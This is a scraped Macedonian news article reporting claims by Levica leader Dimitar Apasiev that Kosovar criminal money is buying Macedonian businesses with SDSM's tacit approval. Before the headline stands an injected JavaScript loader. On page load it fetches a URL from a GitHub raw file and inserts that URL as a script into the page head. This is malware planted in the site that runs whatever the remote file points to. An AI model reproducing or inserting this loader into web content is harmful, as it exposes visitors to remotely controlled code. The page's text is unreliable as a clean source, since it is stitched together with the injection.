;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Апасиев: Со косовски црни пари се купуваат чесните македонските бизниси - Антропол
АктуелноЛокално

Апасиев: Со косовски црни пари се купуваат чесните македонските бизниси

Лидерот на Левица, Димитар Апасиев, вчера гостуваше во емисијата „Аргумент +“ во студиото на ТВ24 каде зборуваше за се почестото купување на разработени бизниси во Македонија од страна на „косоварски“ бизнисмени. Според лидерот на Левица, овој веќе се случува години наназад и истото е нотирано во одредени извештаи.

„Косовски црни пари ги бркаат македонските бизниси. Месни индустрии, земјоделски комбинати се купуваат и во Источна Македонија. Тоа го има и во европски извештаи. Но тоа го дозволува СДСМ и тоа ако не го казни македонскио народ на избори, ние немаме иднина, бидејќи се ќе биде купено од косовски црни пари“, изјави Апасиев.

Според лидерот на Левица, Косовската мафија полесно пере пари во Македонија отколку во Косово и констатираше дека сето ова се случува со одобрување од страна на СДСМ.

„Косовската мафија парите полесно ги пере во Македонија отколку во Косово. Еден протекторат подобро се справува со корупцијата отколку Македонија. Се наликува како пропаста на Отоманското царство, која имала делови кои не ги фаќало закон“, рече Апасиев.